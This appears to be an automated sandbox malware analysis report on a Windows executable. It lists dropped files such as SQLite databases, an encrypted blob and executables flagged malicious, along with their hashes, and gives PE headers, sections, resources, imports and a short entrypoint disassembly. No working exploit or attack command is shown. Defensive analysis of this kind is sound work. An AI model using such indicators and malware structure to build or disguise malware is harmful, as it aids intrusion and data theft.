File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\9EAC.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\A024.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\A0A2.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\A120.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\BC8F.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	modified
Size (bytes):	78336
Entropy (8bit):	6.401797003857336
Encrypted:	false
SSDEEP:	1536:qLGRHFXEMV8cTemFnItAeiU5MSOMRSIXD4k:qGiTiU5MjeVx
MD5:	69C7186C5393D5E94294E39DA1D4D830
SHA1:	7681B66FBDE2FA796A2129B54F1F3BFA0E025133
SHA-256:	1B0BE4B4B45A52650502425ABBBA226CBF0CCE5959F7A178189AE9AD79AB6911
SHA-512:	000691E25AA193B9C5D53EF896524306D74D3DD815A5C335426ABC143DE6BB594BEDF075C0A85925D824F09755B94C7B250F878F93F580302C0E84C137919FCF
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 37%
Joe Sandbox View:	Filename: v173TV3V11.exe, Detection: malicious, Browse Filename: 0k3ibTiMjy.exe, Detection: malicious, Browse Filename: qg5Ddf4an9.exe, Detection: malicious, Browse Filename: aZPm0tHPTX.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........v....................................b......b......b......Rich............PE..d...^..f.........."..........>.................@.............................p............`..................................................(...............P...............`.......................................................................................text............................... ..`.rdata...&.......(..................@..@.data...h....@......................@....pdata.......P......."..............@..@.reloc.......`.......0..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\ddcvief

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	290443
Entropy (8bit):	7.999294022563011
Encrypted:	true
SSDEEP:	6144:ABuboUzJj9HenRwHdUcX2COmB3mi6g2JL5OM2vtHwh:SuDPHCRw9eC5Blh2JsJQh
MD5:	150242179246829EDAB33E89796FA87F
SHA1:	3A0C8B1F4183B5C1046BC35EAD68F17FA6D088A7
SHA-256:	44C3BC908287966A12A42AC16603B9F0E4FFDE9457F1B02ACC28B0E269A90CC2
SHA-512:	636F3BD0D6D37F32E56053C8754A72B6A45734F016C706B692C47AD930C05F2076C0D53A75CCB13DD4B4F2F84DF0FC69E526CF13D76F83ACF42B4357C1118AEE
Malicious:	false
Preview:	LN...,....MFvo...P......(.I....J..PF.d.KohO].[.hq.h..'.....>../.c..t.5G<If..)6.a.`..D"......hzG.Me...E..k..RS.. e...f0...."..X..U.7......6]..Hmz:MBk.2.wC.4......;..G#[......f...{&r#.,...1...P..n.2.\..F:%.....zq...\@2n.1.....1...7vuS.=w.Vc.'.n..h.m...q......L,..&')1....l.... P.....{..4...r..%.j..E..."0...Q..p..j.4...........m.....H...lm...~.......X..Nn...4$.9...?;.z.....$..sQM.....FdA...ND&T.....<w8..MrgE.........+....#.. ..[..wL..Pe.."..}..)GL.z.A...{. V......f..s.....{...dh..Bg..do.~..;X.F.'!.[..V....f...REn.9f`.v3....3.yq.bS..Ww.."..'..N...S.8'.V.1.%_..).1.F.&..<..R..So......h.'i.P.Qr.~B[...\.r.t..3........Q...Jh..V.L.\|..x.../.2D.#...6.....Y..t..Z...L.TL....9.T..N....Z......(..Gu....9.Z..3...>.....C-2{. .....[.d v...,..B.Z..d....(c....L=.J.F..R....bS&.h.....].rmhZ.p...ch...`..b.L.~\|......_....[..).\..t>.....@...\-.%..I.....Ee.2..~./....i.v..~.d.......a.i.P......%.o...j.0M..^P.&.0.FVK.*.a..=.e..PL...^4....Y7..+...`>l.

C:\Users\user\AppData\Roaming\haevsid

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	384512
Entropy (8bit):	6.976562477801165
Encrypted:	false
SSDEEP:	6144:6rkVntaABNOcmGaDOVufNOsGps4qCMasrHBtlFDhTD:+ya0NMfslplxUrHtFDF
MD5:	43DA422957B397E2805362661AB3FD4A
SHA1:	D9FCEE0D2A68C509BD8FC8C30EE263DE5C80B883
SHA-256:	E798106229F6985B40BD436ABAF516360B7D19501F0F8C1CE89A3197EBB421A4
SHA-512:	164AFBBB93A02FB334C57FEA332255CA8F578CEECE8C5AD22FA552CDC31CF45733ABCE2EBC0E8DB224BF3D3D0B21A344358CC0379ADF1D8AFE4D2DB8E0C7574F
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 34%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........k_Zx..Zx..Zx..5...zx..5...\|x..5...>x..S...]x..Zx...x..5...[x..5...[x..5...[x..RichZx..........PE..L...*..d.............................<............@..........................P.......%......................................h...P................................................................... ...@............................................text............................... ..`.rdata..............................@..@.data...h........^..................@....rsrc................B..............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\haevsid:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\uievsid

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	401920
Entropy (8bit):	6.896981606728238
Encrypted:	false
SSDEEP:	6144:HunX9+ryFMNYI7geKHHUxFt4oH9T4iNUTAxfPZO4OXkkjQy4asy4pTf:HuXdFMNYI7gdH03xT4UtYbvQy4Hy4N
MD5:	B39D75B20F14D8DFCB2325D7082CB2B9
SHA1:	CF55C38212461E02D7C8E8386CB1C9B2AC195891
SHA-256:	61FB5D3CEE24C193EC2EE9F73F6222D24A4222DAB4E777EEA02F77B1B261B7C0
SHA-512:	A9E9BC353CE6F65148FFE2E22FF6748405B74E202AA53395FB1D70F12DCF535051CD51F9D1EF6A3F38DA1320EA48C66DB4CA7B2279BE5E9D992643181DBEC8BE
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_.<.>to.>to.>to.H.o.>to.H.o.>to.H.o.>to.F.o.>to.>uo.>to.H.o.>to.H.o.>to.H.o.>toRich.>to........PE..L.....Je.....................D......);.......0....@..........................p.......I..........................................x...................................8...................................@............................................text............................... ..`.data....u...0...b..................@....yatufu..............x..............@....rsrc................\|..............@..@................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.976562477801165
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	veEGy9FijY.exe
File size:	384'512 bytes
MD5:	43da422957b397e2805362661ab3fd4a
SHA1:	d9fcee0d2a68c509bd8fc8c30ee263de5c80b883
SHA256:	e798106229f6985b40bd436abaf516360b7d19501f0f8c1ce89a3197ebb421a4
SHA512:	164afbbb93a02fb334c57fea332255ca8f578ceece8c5ad22fa552cdc31cf45733abce2ebc0e8db224bf3d3d0b21a344358cc0379adf1d8afe4d2db8e0c7574f
SSDEEP:	6144:6rkVntaABNOcmGaDOVufNOsGps4qCMasrHBtlFDhTD:+ya0NMfslplxUrHtFDF
TLSH:	E184B002E3E37D50E53E4B315D6EC7E4662EB4635E5526AF23282A2F1B701A2D573331
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........k_Zx..Zx..Zx..5...zx..5...\|x..5...>x..S...]x..Zx...x..5...[x..5...[x..5...[x..RichZx..........PE..L...*..d...................

File Icon


Icon Hash:	7555512941404443

Static PE Info

General

Entrypoint:	0x403cd9
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x64AD062A [Tue Jul 11 07:35:06 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	5c51ec4a6f442a6a3636ad4616307822

Entrypoint Preview

Instruction
call 00007FA72088803Eh
jmp 00007FA7208847BEh
push dword ptr [00445FFCh]
call dword ptr [0040F10Ch]
test eax, eax
je 00007FA720884934h
call eax
push 00000019h
call 00007FA7208876DBh
push 00000001h
push 00000000h
call 00007FA720885392h
add esp, 0Ch
jmp 00007FA720885357h
mov edi, edi
push ebp
mov ebp, esp
sub esp, 20h
mov eax, dword ptr [ebp+08h]
push esi
push edi
push 00000008h
pop ecx
mov esi, 0040F3D8h
lea edi, dword ptr [ebp-20h]
rep movsd
mov dword ptr [ebp-08h], eax
mov eax, dword ptr [ebp+0Ch]
pop edi
mov dword ptr [ebp-04h], eax
pop esi
test eax, eax
je 00007FA72088493Eh
test byte ptr [eax], 00000008h
je 00007FA720884939h
mov dword ptr [ebp-0Ch], 01994000h
lea eax, dword ptr [ebp-0Ch]
push eax
push dword ptr [ebp-10h]
push dword ptr [ebp-1Ch]
push dword ptr [ebp-20h]
call dword ptr [0040F070h]
leave
retn 0008h
mov edi, edi
push ebp
mov ebp, esp
push ecx
push ebx
mov eax, dword ptr [ebp+0Ch]
add eax, 0Ch
mov dword ptr [ebp-04h], eax
mov ebx, dword ptr fs:[00000000h]
mov eax, dword ptr [ebx]
mov dword ptr fs:[00000000h], eax
mov eax, dword ptr [ebp+08h]
mov ebx, dword ptr [ebp+0Ch]
mov ebp, dword ptr [ebp-04h]
mov esp, dword ptr [ebx-04h]
jmp eax
pop ebx
leave
retn 0008h
pop eax
pop ecx
xchg dword ptr [esp], eax
jmp eax
pop eax
pop ecx
xchg dword ptr [esp], eax
jmp eax
pop eax
pop ecx
xchg dword ptr [esp], eax
jmp eax

Rich Headers

Programming Language:

[ASM] VS2010 build 30319
[C++] VS2010 build 30319
[ C ] VS2010 build 30319
[IMP] VS2008 SP1 build 30729
[RES] VS2010 build 30319
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3f268	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x205b000	0x19ba0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3f2b8	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x3e920	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xf000	0x1d0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xd01d	0xd200	b0327d72c2a33a0b3a92f69887fb206a	False	0.6009114583333334	data	6.69478860947354	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xf000	0x30cfc	0x30e00	5c12d8eec6931293ff9b295dd3d2f8d5	False	0.9344978820332481	data	7.860270906659414	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x40000	0x201a268	0x5e00	5fee256725aaf87aeddcbb9b5ddb66e9	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x205b000	0x19ba0	0x19c00	73f042d26c21d53ac630bf79cf888e2c	False	0.41386339502427183	data	5.001727947299326	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
SOJEFEHOZEHUW	0x206e168	0x136f	ASCII text, with very long lines (4975), with no line terminators	Tamil	India	0.5961809045226131
SOJEFEHOZEHUW	0x206e168	0x136f	ASCII text, with very long lines (4975), with no line terminators	Tamil	Sri Lanka	0.5961809045226131
RT_CURSOR	0x206f520	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.4375
RT_CURSOR	0x206f650	0xb0	Device independent bitmap graphic, 16 x 32 x 1, image size 0			0.44886363636363635
RT_CURSOR	0x206f728	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.27238805970149255
RT_CURSOR	0x20705d0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.375
RT_CURSOR	0x2070e78	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.5057803468208093
RT_CURSOR	0x2071410	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.30943496801705755
RT_CURSOR	0x20722b8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.427797833935018
RT_CURSOR	0x2072b60	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.5469653179190751
RT_ICON	0x205b930	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tamil	India	0.43256929637526653
RT_ICON	0x205b930	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tamil	Sri Lanka	0.43256929637526653
RT_ICON	0x205c7d8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tamil	India	0.5523465703971119
RT_ICON	0x205c7d8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tamil	Sri Lanka	0.5523465703971119
RT_ICON	0x205d080	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Tamil	India	0.5846774193548387
RT_ICON	0x205d080	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Tamil	Sri Lanka	0.5846774193548387
RT_ICON	0x205d748	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tamil	India	0.6011560693641619
RT_ICON	0x205d748	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tamil	Sri Lanka	0.6011560693641619
RT_ICON	0x205dcb0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	India	0.44491701244813275
RT_ICON	0x205dcb0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	Sri Lanka	0.44491701244813275
RT_ICON	0x2060258	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tamil	India	0.4924953095684803
RT_ICON	0x2060258	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tamil	Sri Lanka	0.4924953095684803
RT_ICON	0x2061300	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	India	0.5274822695035462
RT_ICON	0x2061300	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	Sri Lanka	0.5274822695035462
RT_ICON	0x20617d0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tamil	India	0.3805970149253731
RT_ICON	0x20617d0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tamil	Sri Lanka	0.3805970149253731
RT_ICON	0x2062678	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tamil	India	0.5090252707581228
RT_ICON	0x2062678	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tamil	Sri Lanka	0.5090252707581228
RT_ICON	0x2062f20	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Tamil	India	0.5702764976958525
RT_ICON	0x2062f20	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Tamil	Sri Lanka	0.5702764976958525
RT_ICON	0x20635e8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tamil	India	0.5845375722543352
RT_ICON	0x20635e8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tamil	Sri Lanka	0.5845375722543352
RT_ICON	0x2063b50	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	India	0.3744813278008299
RT_ICON	0x2063b50	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	Sri Lanka	0.3744813278008299
RT_ICON	0x20660f8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tamil	India	0.4129924953095685
RT_ICON	0x20660f8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tamil	Sri Lanka	0.4129924953095685
RT_ICON	0x20671a0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Tamil	India	0.4077868852459016
RT_ICON	0x20671a0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Tamil	Sri Lanka	0.4077868852459016
RT_ICON	0x2067b28	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	India	0.47429078014184395
RT_ICON	0x2067b28	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	Sri Lanka	0.47429078014184395
RT_ICON	0x2068008	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tamil	India	0.4936034115138593
RT_ICON	0x2068008	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tamil	Sri Lanka	0.4936034115138593
RT_ICON	0x2068eb0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tamil	India	0.46705776173285196
RT_ICON	0x2068eb0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tamil	Sri Lanka	0.46705776173285196
RT_ICON	0x2069758	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tamil	India	0.4342485549132948
RT_ICON	0x2069758	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tamil	Sri Lanka	0.4342485549132948
RT_ICON	0x2069cc0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	India	0.27852697095435686
RT_ICON	0x2069cc0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	Sri Lanka	0.27852697095435686
RT_ICON	0x206c268	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tamil	India	0.2861163227016886
RT_ICON	0x206c268	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tamil	Sri Lanka	0.2861163227016886
RT_ICON	0x206d310	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Tamil	India	0.3081967213114754
RT_ICON	0x206d310	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Tamil	Sri Lanka	0.3081967213114754
RT_ICON	0x206dc98	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	India	0.3333333333333333
RT_ICON	0x206dc98	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	Sri Lanka	0.3333333333333333
RT_STRING	0x2073358	0x590	data	Tamil	India	0.4396067415730337
RT_STRING	0x2073358	0x590	data	Tamil	Sri Lanka	0.4396067415730337
RT_STRING	0x20738e8	0x5e8	data	Tamil	India	0.4398148148148148
RT_STRING	0x20738e8	0x5e8	data	Tamil	Sri Lanka	0.4398148148148148
RT_STRING	0x2073ed0	0x27e	data	Tamil	India	0.48119122257053293
RT_STRING	0x2073ed0	0x27e	data	Tamil	Sri Lanka	0.48119122257053293
RT_STRING	0x2074150	0x6ee	data	Tamil	India	0.4295377677564825
RT_STRING	0x2074150	0x6ee	data	Tamil	Sri Lanka	0.4295377677564825
RT_STRING	0x2074840	0x35e	data	Tamil	India	0.4605568445475638
RT_STRING	0x2074840	0x35e	data	Tamil	Sri Lanka	0.4605568445475638
RT_ACCELERATOR	0x206f4d8	0x48	data	Tamil	India	0.8472222222222222
RT_ACCELERATOR	0x206f4d8	0x48	data	Tamil	Sri Lanka	0.8472222222222222
RT_GROUP_CURSOR	0x206f700	0x22	data			1.0588235294117647
RT_GROUP_CURSOR	0x20713e0	0x30	data			0.9375
RT_GROUP_CURSOR	0x20730c8	0x30	data			0.9375
RT_GROUP_ICON	0x2061768	0x68	data	Tamil	India	0.6826923076923077
RT_GROUP_ICON	0x2061768	0x68	data	Tamil	Sri Lanka	0.6826923076923077
RT_GROUP_ICON	0x2067f90	0x76	data	Tamil	India	0.6779661016949152
RT_GROUP_ICON	0x2067f90	0x76	data	Tamil	Sri Lanka	0.6779661016949152
RT_GROUP_ICON	0x206e100	0x68	data	Tamil	India	0.7115384615384616
RT_GROUP_ICON	0x206e100	0x68	data	Tamil	Sri Lanka	0.7115384615384616
RT_VERSION	0x20730f8	0x25c	data			0.5380794701986755

Imports

DLL	Import
KERNEL32.dll	GetConsoleAliasExesA, InterlockedIncrement, CreateJobObjectW, InterlockedCompareExchange, SetVolumeMountPointW, GetTimeFormatA, CreateHardLinkA, _lcreat, LocalFlags, SetFileTime, ClearCommBreak, SetFileShortNameW, LoadLibraryW, CopyFileW, _hread, GetCalendarInfoA, SetVolumeMountPointA, GetVersionExW, GetFileAttributesW, VerifyVersionInfoA, GetModuleFileNameW, CreateActCtxA, GetEnvironmentVariableA, RaiseException, LCMapStringA, InterlockedExchange, GetStdHandle, GetLogicalDriveStringsA, GetLastError, GetLocaleInfoA, CreateNamedPipeA, EnumSystemCodePagesW, SetComputerNameA, GlobalFree, LoadLibraryA, InterlockedExchangeAdd, LocalAlloc, SetCalendarInfoW, GetNumberFormatW, CreateEventW, OpenEventA, QueryDosDeviceW, FoldStringA, SetEnvironmentVariableA, GlobalWire, GetCurrentDirectoryA, EnumDateFormatsW, GetShortPathNameW, SetProcessShutdownParameters, GetDiskFreeSpaceExW, ReadConsoleInputW, DebugBreak, GetTempPathA, SetFileAttributesW, CommConfigDialogW, TlsGetValue, SetFilePointer, EnumCalendarInfoA, GetProcAddress, GetComputerNameA, InterlockedDecrement, EncodePointer, DecodePointer, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, HeapFree, HeapReAlloc, GetModuleHandleW, ExitProcess, GetCommandLineW, HeapSetInformation, GetStartupInfoW, RtlUnwind, HeapAlloc, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, HeapCreate, HeapSize, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, WriteFile, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetACP, GetOEMCP, IsValidCodePage, GetStringTypeW
GDI32.dll	GetBkMode, CreateDCW, GetCharWidth32A, GetCharWidthI
WINHTTP.dll	WinHttpOpen

Possible Origin

Language of compilation system	Country where language is spoken	Map
Tamil	India
Tamil	Sri Lanka

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
